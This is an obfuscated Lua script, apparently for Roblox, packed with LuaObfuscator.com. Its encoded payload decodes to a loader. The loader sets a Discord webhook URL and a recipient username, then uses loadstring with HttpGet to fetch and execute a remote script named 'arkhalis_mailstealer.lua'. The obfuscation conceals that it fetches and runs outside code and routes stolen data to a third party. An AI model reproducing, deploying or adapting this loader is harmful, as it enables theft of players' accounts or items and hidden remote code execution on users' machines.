--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v34,v35,v36)if v36 then local v79=1637 -(1523 + 114) ;local v80;while true do if (v79==(0 -0)) then v80=(v34/((2 -0)^(v35-(1066 -(68 + 997)))))%((1272 -(226 + 1044))^(((v36-((1138 -518) -(555 + 64))) -(v35-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v80-(v80%(928 -(214 + 713))) ;end end else local v81=(1 + 1)^(v35-((351 -(87 + 263)) + (180 -(67 + 113)))) ;return (((v34%(v81 + v81))>=v81) and (1 + 0)) or (877 -(282 + 437 + 158)) ;end end v22=nil;v18=2;end if (v18==4) then function v25()local v37=v24();local v38=v24();local v39=1 -0 ;local v40=(v21(v38,1 + 0 ,49 -29 ) * ((1 + 1 + 0)^32)) + v37 ;local v41=v21(v38,65 -44 ,49 -(10 + 7 + 1) );local v42=((v21(v38,(899 -(201 + 571)) -(1233 -(116 + 1022)) )==(953 -(802 + 150))) and  -(2 -1)) or (3 -2) ;if (v41==(0 + 0)) then if (v40==(0 -0)) then return v42 * (0 + (0 -0)) ;else v41=998 -(915 + 82) ;v39=0 -0 ;end elseif (v41==(1193 + 854)) then return ((v40==(0 -0)) and (v42 * ((1188 -(1069 + 118))/(0 -0)))) or (v42 * NaN) ;end return v8(v42,v41-1023 ) * (v39 + (v40/((3 -1)^(10 + 42)))) ;end v26=nil;function v26(v43)local v44=0 + (1423 -(630 + 793)) ;local v45;local v46;while true do if (v44==((0 -0) -0)) then v45=nil;if  not v43 then v43=v24();if (v43==(0 -0)) then return "";end end v44=860 -(814 + 45) ;end if (v44==2) then v46={};for v90=2 -1 , #v45 do v46[v90]=v2(v1(v3(v45,v90,v90)));end v44=1 + 2 ;end if (v44==(1 + (0 -0))) then v45=v3(v16,v19,(v19 + v43) -(886 -(261 + 624)) );v19=v19 + v43 ;v44=3 -1 ;end if (v44==((427 + 656) -(1020 + 60))) then return v6(v46);end end end v18=5;end if (v18==6) then v29=nil;function v29()local v47=0;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47~=(0 + 0)) then else local v87=0;while true do if (v87~=(0 -0)) then else v48={};v49={};v87=1;end if (v87~=(677 -(534 + 141))) then else v47=701 -(271 + 429) ;break;end if (v87~=(1 + 0)) then else v50={};v51={v48,v49,nil,v50};v87=2 + 0 ;end end end if ((1087 -(461 + 625))==v47) then local v88=0;while true do if (v88==2) then v47=2;break;end if (v88~=1) then else for v97=1289 -(993 + 295) ,v52 do local v98=0 + 0 ;local v99;local v100;local v101;while true do if (v98==1) then v101=nil;while true do if (v99==(1171 -(418 + 753))) then v100=v22();v101=nil;v99=1 -0 ;end if (v99~=(1 -0)) then else if (v100==1) then v101=v22()~=0 ;elseif (v100==(5 -3)) then v101=v25();elseif (v100~=(2 + 1)) then else v101=v26();end v53[v97]=v101;break;end end break;end if ((0 + 0)==v98) then v99=0 + 0 ;v100=nil;v98=397 -(115 + 281) ;end end end v51[3]=v22();v88=2;end if (v88~=(0 -0)) then else v52=v24();v53={};v88=1;end end end if (v47==(2 + 0)) then local v89=1769 -(1749 + 20) ;while true do if (v89~=(0 -0)) then else for v102=3 -2 ,v24() do local v103=1322 -(1249 + 73) ;local v104;local v105;while true do if (v103~=(1 + 0)) then else while true do if ((867 -(550 + 317))==v104) then v105=v22();if (v21(v105,1146 -(466 + 679) ,2 -1 )~=(0 -0)) then else local v156=0;local v157;local v158;local v159;while true do if (v156~=0) then else local v169=0;while true do if (1==v169) then v156=1;break;end if (v169==(0 -0)) then local v176=0;while true do if (v176==(1 -0)) then v169=1;break;end if (v176==(0 + 0)) then v157=v21(v105,5 -3 ,288 -(134 + 151) );v158=v21(v105,1669 -(970 + 695) ,11 -5 );v176=1;end end end end end if (v156~=1) then else local v170=1427 -(41 + 1386) ;local v171;while true do if ((1990 -(582 + 1408))~=v170) then else v171=0 -0 ;while true do if ((1 -0)==v171) then v156=2;break;end if ((0 -0)==v171) then local v178=0;while true do if (v178==0) then v159={v23(),v23(),nil,nil};if (v157==(241 -(187 + 54))) then local v183=0;local v184;local v185;while true do if (v183==(780 -(162 + 618))) then v184=0 -0 ;v185=nil;v183=1 + 0 ;end if ((1 + 0)==v183) then while true do if (v184~=(65 -(30 + 35))) then else v185=0 -0 ;while true do if (v185~=(0 -0)) then else v159[3 + 0 ]=v23();v159[1 + 3 ]=v23();break;end end break;end end break;end end elseif (v157==(1637 -(1373 + 263))) then v159[3]=v24();elseif (v157==(1002 -(451 + 549))) then v159[1 + 2 ]=v24() -(2^(24 -8)) ;elseif (v157~=(4 -1)) then else local v188=0 -0 ;local v189;local v190;while true do if (v188~=(1384 -(746 + 638))) then else v189=0 + 0 ;v190=nil;v188=321 -(53 + 267) ;end if (v188==1) then while true do if (v189==0) then v190=0;while true do if (v190~=(0 -0)) then else v159[3]=v24() -(2^(357 -(218 + 123))) ;v159[4]=v23();break;end end break;end end break;end end end v178=983 -(18 + 964) ;end if (v178==(1582 -(1535 + 46))) then v171=3 -2 ;break;end end end end break;end end end if (v156==(2 + 1)) then if (v21(v158,3 + 0 ,853 -(20 + 830) )~=(1 + 0)) then else v159[1 + 3 ]=v53[v159[564 -(306 + 254) ]];end v48[v102]=v159;break;end if (v156==(1 + 1)) then local v173=0 + 0 ;while true do if (v173==0) then local v177=0 -0 ;while true do if (v177~=(1468 -(899 + 568))) then else v173=1 + 0 ;break;end if (v177~=(0 -0)) then else if (v21(v158,1,1 + 0 )~=(604 -(268 + 335))) then else v159[292 -(60 + 230) ]=v53[v159[4 -2 ]];end if (v21(v158,574 -(426 + 146) ,1 + 1 )==1) then v159[1459 -(282 + 1174) ]=v53[v159[1554 -(1126 + 425) ]];end v177=812 -(569 + 242) ;end end end if (v173==(2 -1)) then v156=3;break;end end end end end break;end end break;end if (0==v103) then local v109=0 -0 ;while true do if (v109~=(1121 -(118 + 1003))) then else v104=0 -0 ;v105=nil;v109=1 + 0 ;end if (v109==(1025 -(706 + 318))) then v103=1252 -(721 + 530) ;break;end end end end end for v106=1,v24() do v49[v106-(1272 -(945 + 326)) ]=v29();end v89=2 -1 ;end if (v89==(978 -(553 + 424))) then return v51;end end end end end v30=nil;v18=7;end if (v18==3) then v24=nil;function v24()local v54,v55,v56,v57=v1(v16,v19,v19 + 3 );v19=v19 + 4 ;return (v57 * (31725000 -14947784)) + (v56 * (57732 + 7804)) + (v55 * (254 + 2)) + v54 ;end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v65=v61;local v66=v62;local v67=v63;local v68=v28;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v82=0,v73 do if (v82>=v67) then v71[v82-v67 ]=v72[v82 + 1 ];else v75[v82]=v72[v82 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1];if (v78<=10) then if (v78<=4) then if (v78<=1) then if (v78==0) then v75[v77[2]]=v77[3];else v75[v77[2]]();end elseif (v78<=2) then v75[v77[2]]=v77[3];elseif (v78>3) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end elseif (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end elseif (v78<=7) then if (v78<=5) then v75[v77[2]]=v77[3]~=0 ;elseif (v78==6) then local v132=0;local v133;local v134;while true do if (v132==1) then v75[v133 + 1 ]=v134;v75[v133]=v134[v77[4]];break;end if (v132==0) then v133=v77[2];v134=v75[v77[3]];v132=1;end end else v69=v77[3];end elseif (v78<=8) then v75[v77[2]][v77[3]]=v77[4];elseif (v78==9) then v75[v77[2]]=v77[3]~=0 ;else v75[v77[2]][v77[3]]=v77[4];end elseif (v78<=15) then if (v78<=12) then if (v78>11) then v75[v77[2]]=v60[v77[3]];else local v119=0;local v120;while true do if (v119==0) then v120=v77[2];v75[v120]=v75[v120](v13(v75,v120 + 1 ,v70));break;end end end elseif (v78<=13) then local v121=v77[2];local v122,v123=v68(v75[v121](v13(v75,v121 + 1 ,v77[3])));v70=(v123 + v121) -1 ;local v124=0;for v130=v121,v70 do local v131=0;while true do if (v131==0) then v124=v124 + 1 ;v75[v130]=v122[v124];break;end end end elseif (v78>14) then do return;end else local v139=0;local v140;local v141;local v142;local v143;while true do if (v139==1) then v70=(v142 + v140) -1 ;v143=0;v139=2;end if (v139==2) then for v166=v140,v70 do v143=v143 + 1 ;v75[v166]=v141[v143];end break;end if (v139==0) then v140=v77[2];v141,v142=v68(v75[v140](v13(v75,v140 + 1 ,v77[3])));v139=1;end end end elseif (v78<=18) then if (v78<=16) then do return;end elseif (v78==17) then local v144=v77[2];v75[v144]=v75[v144](v13(v75,v144 + 1 ,v70));else v69=v77[3];end elseif (v78<=19) then local v125=v77[2];local v126=v75[v77[3]];v75[v125 + 1 ]=v126;v75[v125]=v126[v77[4]];elseif (v78>20) then v75[v77[2]]=v60[v77[3]];else v75[v77[2]]();end v69=v69 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v64)if (v1(v64,2)==79) then v20=v0(v3(v64,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v64,16));if v20 then local v108=v5(v86,v20);v20=nil;return v108;else return v86;end break;end end end end);v18=1;end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31302O3931363338332O39363832313731362F7763344667423658377646696E59455A6F56704A6F39445A6F4E4566613872565571495239745777686679563268414E4A674B3971364D4A6353466D3450615274694842030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D653103083O006368756F70615F3803093O00557365726E616D653200173O0012023O00013O0026043O000E000100020004123O000E000100120C000100033O00300A00010004000500120C000100063O00120C000200073O002006000200020008001202000400094O0005000500014O000D000200054O001100013O00022O00140001000100010004123O001600010026043O0001000100010004123O0001000100120C000100033O00300A0001000A000B00120C000100033O00300A0001000C000B0012023O00023O0004123O000100012O00103O00017O00",v9(),...);end
